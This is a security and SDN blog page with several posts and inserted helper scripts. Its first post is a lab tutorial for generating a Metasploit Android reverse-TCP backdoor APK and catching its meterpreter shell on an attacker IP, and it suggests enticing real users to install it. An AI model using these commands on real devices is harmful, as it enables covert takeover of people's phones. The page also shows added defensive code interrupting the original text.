Saturday, April 12, 2014

Hacking Android devices using Metasploit Backdoor

In this post we will see how to use backdoors generated by Metasploit to gain access to Android devices. I am using a Nexus 7 tablet as the victim.

SETUP DESCRIPTION
192.168.1.102   Victim's IP address (Android Nexus 7 tablet)
192.168.1.140   Attacker's IP address (Metasploit)

I am using the AirDroid app on the Nexus 7 to download the Metasploit backdoor (that is, the malicious app). In real scenarios we can host a web server with the malicious app and entice users to install the app using various social engineering techniques.

BACKDOOR CREATION
Using Kali Linux with the Metasploit Framework installed to generate the payload (msfpayload has since been replaced by msfvenom in current Metasploit releases):
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.140 LPORT=4488 R > andr_bd.apk
msfpayload   Metasploit command to create payloads (exe, java, apk etc.)
LHOST        (local host) attacker's IP address for the victim to connect back to
LPORT        (local port) port for the victim to connect back to
R            msfpayload parameter indicating generation of the raw payload
APK          Android application package file

Successful execution of msfpayload creates andr_bd.apk, which is a Metasploit reverse TCP backdoor. When the app is installed on any Android device, it connects back to the attacker's IP address (192.168.1.140 here). Copy the app to the Nexus 7 tablet using AirDroid and install it; a successful installation shows the screenshot given below.

Before installing the app on the Nexus 7, the attacker needs to run the following Metasploit commands so that the victim's device can connect back to the attacker's machine.
$ msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.140
msf exploit(handler) > set LPORT 4488
msf exploit(handler) > exploit

We successfully got Metasploit’s meterpreter shell.

Post exploitation commands
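A defender-side check that follows from the above, added here as an example and not part of the original post: a Python triage script that opens an APK as the ZIP archive it is and scans every dex entry for the class names used by Metasploit's stock Android payload. The marker strings and the constructed sample APK are assumptions, not taken from the post.

```python
"""Triage a sideloaded APK for the class markers of Metasploit's stock
Android payload. An APK is a ZIP archive; the Dalvik bytecode in
classes.dex carries type descriptors such as "Lcom/metasploit/stage/Payload;",
so a substring scan of every dex entry is enough for a first check."""
import io
import zipfile

# Assumed markers: class names of Metasploit's Android payload template.
# A repackaged or obfuscated build will not match; treat a miss as "unknown".
MARKERS = (
    b"Lcom/metasploit/stage/Payload;",
    b"Lcom/metasploit/stage/MainActivity;",
)

def scan_apk(apk_bytes):
    """Return {dex entry name: [markers found in it]} for the archive."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            # Multidex apps carry classes.dex, classes2.dex, ...
            if not (name.startswith("classes") and name.endswith(".dex")):
                continue
            data = zf.read(name)
            findings[name] = [m.decode() for m in MARKERS if m in data]
    return findings

def is_suspicious(apk_bytes):
    """True when any dex entry contains at least one marker."""
    return any(scan_apk(apk_bytes).values())

def make_sample_apk(dex_payload):
    """Build a constructed in-memory APK (not a real app) for demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<constructed/>")
        # "dex\n035\0" is the dex file magic; the rest is filler around a marker
        zf.writestr("classes.dex", b"dex\n035\x00" + dex_payload)
    return buf.getvalue()

if __name__ == "__main__":
    flagged = make_sample_apk(b"..." + MARKERS[0] + b"...")
    clean = make_sample_apk(b"...Lcom/example/app/Main;...")
    print(scan_apk(flagged), is_suspicious(flagged), is_suspicious(clean))
```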

Full paper can be accessed from
http://disects.com/whitepapers/Hacking_Android_devices_using_Metasploit_backdoors.pdf

Following articles might be of interest
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

Saturday, April 5, 2014

WinDBG: Useful Debugging Commands

Open "Debugging Tools for Windows" help file
0:017> .hh

Display registers
0:017> r

Display Current Process
0:017> |.
0:017> |
Unassemble a function or address
0:017> uf mshtml!CElement::Doc
0:017> u address

Assemble at an address
0:017> a address

Stack trace
0:017> knL

Display stack backtrace
0:017> k

Trace: the t command executes a single instruction or source line and optionally displays the resulting values of all registers and flags.
0:017> t

Set break point
0:017> bp address

List break points
0:017> bl

Search for a String
0:017> s -a 0x00000000 L?7fffffff "disects"

A DLL is loaded between 03b10000 and 03fdd000; search that address range (given as start and end address) for the bytes 5d c3
0:014> s 03b10000 03fdd000 5d c3

On Intel machines, looking at the disassembled SEH code, you will see an instruction that moves a DWORD ptr from FS:[0] (mov eax, dword ptr fs:[0]). This ensures that the exception handler is set up for the thread and will be able to catch errors when they occur. The opcode for this instruction is 64A100000000. If you cannot find this opcode, the application/thread may not have exception handling at all.

Dump the TEB
0:017> d fs:[0]

Displays the current exception handler chain
0:017> !exchain

Display information about a local variable, global variable or data types(structures and unions). 
0:017> dt var1

Display the array arr1 under var1
0:017> dt var1 -a arr1

Display all types and globals under nt
0:017> dt nt!*

Look at the default process heap; shows the percentage of busy blocks
0:017> !heap -stat -h 00150000

List allocations of a specific size
0:017> !heap -flt s fffe0

Display data at an address or a register
0:017> d 03694024-10
0:017> d esp

Find which heap entry a particular address (here, 0c0c0c0c) belongs to
0:017> !heap -p -a 0c0c0c0c

Refer to the link below for further reference
http://windbg.info/doc/1-common-cmds.html

Thursday, April 3, 2014

Nmap Scripting Engine: Auditing MySQL Server

Nmap is an open source tool for network mapping, network inventory and security auditing. Nmap uses raw IP packets to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

MySQL is an open source relational database management system (RDBMS).

I am using an Nmap TCP SYN scan to find all open ports.

Nmap scripts are located at /usr/share/nmap/scripts on Kali Linux.
 
The snapshot below shows the scripts we used to audit the MySQL server. The Nmap scripts disclose critical information like usernames, accounts without a password, version, dump of hashes etc.

To run all the scripts related to MySQL, execute the command below.
# nmap --script "mysql-*" target_ip

In the above snapshots, replace 127.0.0.1 with the IP you want to scan/audit.
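When the same audit is run across many servers, the NSE output is easier to review from nmap's XML output (-oX) than from screenshots. The following script is an added example, not part of the original post: it parses that XML, collects every mysql-* script result per open port, and flags hosts where mysql-empty-password reported an account without a password. The XML below is a constructed sample in nmap's layout, not real scan output.

```python
"""Parse nmap XML output (-oX) and collect the results of the mysql-* NSE
scripts per host, so an audit of many servers can be reviewed in one table."""
import xml.etree.ElementTree as ET

def mysql_findings(nmap_xml):
    """Return {"host:port": {script_id: output}} for open ports with mysql-* scripts."""
    results = {}
    root = ET.fromstring(nmap_xml)
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports carry no useful script output
            for script in port.findall("script"):
                sid = script.get("id", "")
                if sid.startswith("mysql-"):
                    key = "%s:%s" % (addr, port.get("portid"))
                    results.setdefault(key, {})[sid] = script.get("output", "").strip()
    return results

def risky_hosts(findings):
    """Hosts where mysql-empty-password reported an account with no password."""
    return sorted(h for h, s in findings.items()
                  if "has empty password" in s.get("mysql-empty-password", ""))

# Constructed sample in nmap's XML layout (not real scan output).
SAMPLE_XML = """<nmaprun>
 <host><address addr="192.0.2.10" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="3306"><state state="open"/>
   <service name="mysql"/>
   <script id="mysql-info" output="Protocol: 10&#10;Version: 5.5.35"/>
   <script id="mysql-empty-password" output="root account has empty password"/>
  </port></ports></host>
 <host><address addr="192.0.2.11" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="3306"><state state="closed"/>
   <script id="mysql-info" output="should be ignored"/>
  </port></ports></host>
</nmaprun>"""

if __name__ == "__main__":
    found = mysql_findings(SAMPLE_XML)
    for host, scripts in found.items():
        for sid, out in scripts.items():
            print(host, sid, out.replace("\n", " | "))
    print("hosts needing attention:", risky_hosts(found))
```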
 

Wednesday, March 26, 2014

Opendaylight (ODL) Controller Debugging using OSGI Commands


Most of the commands work with the CPqD switch; there are some limitations/bugs with OVSK.
A few commands work for openflowplugin and a few for the controller.

removeMeter
removeMeters
addMeter
addMeters
modifyMeter
modifyMeters
removeGroup
addGroup
modifyGroup
portDescStats
flowStats
tableStats
groupStats
meterStats
meterConfigStats
aggregateStats
descStats
addMDFlow
modifyMDFlow
removeMDFlow
startSync
addFlows
modifyFlows
removeFlows
modifyTable
addGroups
modifyGroups
removeGroups
tbegin
tcommit
trollback
cacheinfo
setLogLevel
getLogLevel
create
destroy
listen
unlisten
myController
getClusterNodes
listcaches
put
remove
dumper
get
listenActive
unlistenActive
putComplex
updateComplex
printUserLink
addUserLink
deleteUserLink
printNodeEdges
readflows
readflow
readports
readport
readtable
readdescr
modifyflow
removeflow
addflowv6
removeflowv6
umAddUser
umRemUser
umGetUsers
addAAAServer
removeAAAServer
printAAAServers
ofdumpstatsmgr
resetSwitchCapability
ofbw
txratewindow
ofstatsmgrintervals
prlh
prll
psl
pht
pet
ptick
pcc
ptm
psize
page
sage
eage
dage
scc
ecc
dcc
psnp
esnp
dsnp
spause
sdi
sports
addsw
remsw
pthrot
ethrot
dthrot
pem
bwfactor
px2r
px2rc
controllerShowQueueSize
controllerShowSwitches
controllerReset
controllerShowConnConfig
dumpPendingARPReqList
dumpFailedARPReqList
pencs
pdm
psc
pfc
psd
psp
psm
addContainer
createContainer
removeContainer
addContainerEntry
removeContainerEntry
addContainerFlow
removeContainerFlow
containermgrGetRoles
containermgrGetAuthorizedGroups
containermgrGetAuthorizedResources
containermgrGetResourcesForGroup
containermgrGetUserLevel
containermgrGetUserResources
saveConfig
api3ut
scheme
printNodes

Tuesday, March 25, 2014

OpenFlow 1.3 Protocol Packet Structure: OFPT_HELLO

The OpenFlow protocol is used for communication between the ODL controller and switches that support OpenFlow (OVSK, CPqD, Cisco switches (N3K, Cat3K etc.), Brocade, HP, Juniper etc.). Each OpenFlow message begins with the OpenFlow header, which has version (0x04 for OF1.3, 1 byte), type (1 byte), length (2 bytes) and transaction ID (4 bytes). In OF1.3 there are 30 different message types, whose names start with OFPT_; OFPT_HELLO is type 0.

192.168.56.103   Controller
192.168.56.104   Mininet (OVSK)
192.168.56.102   Mininet (CPqD)



If the Protocol column in Wireshark shows TCP instead of OpenFlow, right-click on the packet of interest -> Decode As -> Transport tab -> select OpenFlow -> OK
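The header layout described above, worked through in Python as an added example (not code from the post): a parser for the 8-byte header, a parser for OFPT_HELLO that also reads the OF1.3 version-bitmap hello element, and a builder for the hello a controller or switch sends. Constants follow the OpenFlow 1.3 specification; the sample messages are constructed inline.

```python
"""Parse and build OpenFlow 1.3 OFPT_HELLO messages. The 8-byte ofp_header is
version(1) type(1) length(2) xid(4), big-endian. An OF1.3 hello may carry hello
elements; OFPHET_VERSIONBITMAP lists the versions the peer speaks as a bitmap
(bit 4 set means wire version 0x04 = OpenFlow 1.3)."""
import struct

OFP_VERSION_13 = 0x04
OFPT_HELLO = 0
OFPHET_VERSIONBITMAP = 1
HEADER = struct.Struct("!BBHI")  # version, type, length, xid

def parse_header(data):
    if len(data) < HEADER.size:
        raise ValueError("short OpenFlow header: %d bytes" % len(data))
    version, msg_type, length, xid = HEADER.unpack_from(data)
    if length < HEADER.size or length > len(data):
        raise ValueError("length field %d disagrees with buffer" % length)
    return {"version": version, "type": msg_type, "length": length, "xid": xid}

def parse_hello(data):
    """Header plus the versions advertised in bitmap elements (empty when the
    hello carries no elements, as OF1.0-1.2 peers send)."""
    hdr = parse_header(data)
    if hdr["type"] != OFPT_HELLO:
        raise ValueError("not OFPT_HELLO (type %d)" % hdr["type"])
    versions, off = [], HEADER.size
    while off + 4 <= hdr["length"]:
        etype, elen = struct.unpack_from("!HH", data, off)  # element header
        if elen < 4 or off + elen > hdr["length"]:
            raise ValueError("bad hello element length %d" % elen)
        if etype == OFPHET_VERSIONBITMAP:
            n_words = (elen - 4) // 4
            for w, bitmap in enumerate(struct.unpack_from("!%dI" % n_words, data, off + 4)):
                versions += [32 * w + b for b in range(32) if bitmap >> b & 1]
        off += (elen + 7) // 8 * 8  # elements are padded to 8-byte alignment
    hdr["versions"] = versions
    return hdr

def build_hello(xid, versions=(OFP_VERSION_13,)):
    """Hello with one version bitmap element: header(8) + element(4 + 4)."""
    bitmap = 0
    for v in versions:
        bitmap |= 1 << v
    elem = struct.pack("!HHI", OFPHET_VERSIONBITMAP, 8, bitmap)
    return HEADER.pack(max(versions), OFPT_HELLO, HEADER.size + len(elem), xid) + elem

if __name__ == "__main__":
    print(parse_hello(build_hello(0x2A)))
```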

Monday, March 24, 2014

SDN Opendaylight Controller: Add/Remove Flow Entries using REST


Start Controller
$ ./run.sh

Start Open vSwitches using Mininet
$ sudo mn --topo single,2 --controller remote,ip=192.168.56.101 --switch ovsk,protocols=OpenFlow13


192.168.56.101   Virtual machine (VM) where the Opendaylight (ODL) controller is running
192.168.56.102   VM where Mininet is running

We will be using f206.xml for our testing.

Before sending the REST request, click on the Basic Auth tab and configure username/password as admin/admin, which are the default credentials for accessing the controller GUI, then click Refresh Headers. Also configure Content-Type and Accept as shown below.

To add a flow entry to Open vSwitch, use the PUT request method.

The table_id and id tags of the XML become part of the REST request URL:

http://192.168.56.101:8080/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/2/flow/133

Select raw -> XML as the data format, copy f206.xml into the text body and click Send. It should return a "200 OK" status code, which indicates the flow was successfully sent to the controller without any issues; the information is saved in the controller's cache (configuration data store).



Whether the flow was successfully pushed to the switch can be verified using the ovs-ofctl command.

To remove a flow from Switch using REST request use DELETE request instead of PUT.
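The same add/remove exchange scripted in Python, added here as an example and not taken from the post: the URL is derived from the table_id and id elements of the flow XML (the point made above), the request carries Basic Auth admin/admin with XML Content-Type and Accept headers, and the method switches between PUT and DELETE. The flow XML is a constructed minimal sample, not the post's f206.xml, and its namespace is an assumption about the openflowplugin flow model.

```python
"""Derive the ODL RESTCONF URL from the flow XML and send it with PUT (add)
or DELETE (remove). The table_id and id elements of the XML must match the
URL path, otherwise the controller rejects the request."""
import base64
import urllib.request
import xml.etree.ElementTree as ET

CONTROLLER = "http://192.168.56.101:8080"
# Constructed sample flow (not the post's f206.xml); the namespace is an
# assumption about the openflowplugin flow model of that ODL release.
SAMPLE_FLOW = ('<flow xmlns="urn:opendaylight:flow:inventory">'
               '<id>133</id><table_id>2</table_id><priority>2</priority></flow>')

def _child_text(root, local_name):
    """Find an element by local name, ignoring any XML namespace."""
    for el in root.iter():
        if el.tag.split("}")[-1] == local_name:
            return (el.text or "").strip()
    return None

def flow_url(flow_xml, node="openflow:1", base=CONTROLLER):
    root = ET.fromstring(flow_xml)
    flow_id, table_id = _child_text(root, "id"), _child_text(root, "table_id")
    if not flow_id or not table_id:
        raise ValueError("flow XML must carry <id> and <table_id>")
    return ("%s/restconf/config/opendaylight-inventory:nodes/node/%s/table/%s/flow/%s"
            % (base, node, table_id, flow_id))

def auth_header(user="admin", password="admin"):
    """HTTP Basic header for the controller's default admin/admin login."""
    return "Basic " + base64.b64encode(("%s:%s" % (user, password)).encode()).decode()

def flow_request(flow_xml, method="PUT"):
    """PUT stores the flow in the config datastore; DELETE removes it."""
    body = flow_xml.encode() if method == "PUT" else None
    req = urllib.request.Request(flow_url(flow_xml), data=body, method=method)
    req.add_header("Authorization", auth_header())
    req.add_header("Content-Type", "application/xml")
    req.add_header("Accept", "application/xml")
    return req

def send(req, timeout=5):
    """Return the HTTP status code; 200 means the controller accepted the request."""
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status

if __name__ == "__main__":
    req = flow_request(SAMPLE_FLOW)
    print(req.get_method(), req.full_url)
    print("status:", send(req))
```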

Following articles might be of interest
SDN Opendaylight Controller: Add/Remove Flow Entries using OSGI CLI
http://blog.disects.com/2014/03/sdn-opendaylight-controller-addremove_24.html

ovs-ofctl OVS action commands for OpenFlow 1.3
http://blog.disects.com/2014/01/ovs-ofctl-ovs-action-commands-for.html

ovs-ofctl commands on OpenFlow 1.3 Mininet Open vSwitch (OVSK)
http://blog.disects.com/2014/01/ovs-ofctl-commands-on-openflow-13.html 

Interested in Ethical Hacking!
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html